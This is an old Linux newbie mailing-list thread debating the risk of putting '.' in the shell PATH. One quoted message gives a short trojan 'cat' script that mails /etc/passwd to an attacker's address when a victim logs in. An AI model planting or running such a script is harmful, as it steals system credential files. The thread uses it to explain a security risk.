According to Karel Bemelmans: While burning my CPU.
>
> On Sun, 30 Aug 1998, Mike wrote:
>
> > Date: Sun, 30 Aug 1998 16:04:59 +0100 (GMT)
> > From: Mike <[EMAIL PROTECTED]>
> > Reply-To: Mike Ricketts <[EMAIL PROTECTED]>
> > To: Gevaerts Frank <[EMAIL PROTECTED]>
> > Cc: Kenneth Stephen <[EMAIL PROTECTED]>,
> linux-newbie <[EMAIL PROTECTED]>
> > Subject: Re: Correctness of the newbie FAQ
> >
> > On Sat, 29 Aug 1998, Gevaerts Frank wrote:
> >
> > > If you don't have '.' in your path, you can't execute programs in the
> > > current directory, unless you type in a full pathname. If you have it in
> > > your path, and some malicious user makes a nasty script and calls it ls,
> > > if you try to do 'ls' in his homedirectory, you will in fact execute his
> > > script.
> > > You can avoid this by placing '.' last in your path, but as the FAQ points
> > > out, our evil user could then make a script 'sl', hoping you would make a
> > > typo in his homedirectory.
> > > If you don't have '.' in your path at all, but only /bin, /usr/bin ...,
> > > you can only execute binaries in those directories, in which normal usres
> > > can't (or shouldn't be able to) change anything
> > >
> > There is an even more serious possibility if a user has '.' at the start
> > of their path. Consider a user with . in their path, who as a login
> > script something like:
> > # .bash_profile
> >
> > # Get the aliases and functions
> > if [ -f ~/.bashrc ]; then
> > . ~/.bashrc
> > fi
> >
> > # User specific environment and startup programs
> >
> > PATH=.:$PATH:$HOME/bin
> > ENV=$HOME/.bashrc
> > USERNAME=""
> >
> > export USERNAME ENV PATH
> >
> > cat ~/todo
> >
> > Now a hacker creates a script in that user's home directory, called cat,
> > that does
> > #!/bin/bash
> > /bin/cat /etc/passwd | mail [EMAIL PROTECTED]
> > /bin/cat $*
> >
> > Now the next time your user logs in, your password file gets mailed and
> > the hacker can carry out a dictionary attack. Not good.
>
> Aren't we being a bit too paranoid ?
>
> First, if he gets access to your account, even ftp only, he might just
> download the /etc/passwd file right away. And second, most systems use
> shadow, so /etc/passwd is useless for a cracker.
Do not forget;
3) If its left as it is installed which is -rw-r--r-- "anyone" can read or
cat it anyway.
After all the passwd is encripted, ok so encription is not secure.
>
>
> Karel
>
>
> Karel Bemelmans, Narfum Inc.
>
> [-- Contact --] --> [EMAIL PROTECTED]
> [-- Website --] --> http://www.narfum.org
>
--
Regards Richard.
[EMAIL PROTECTED]
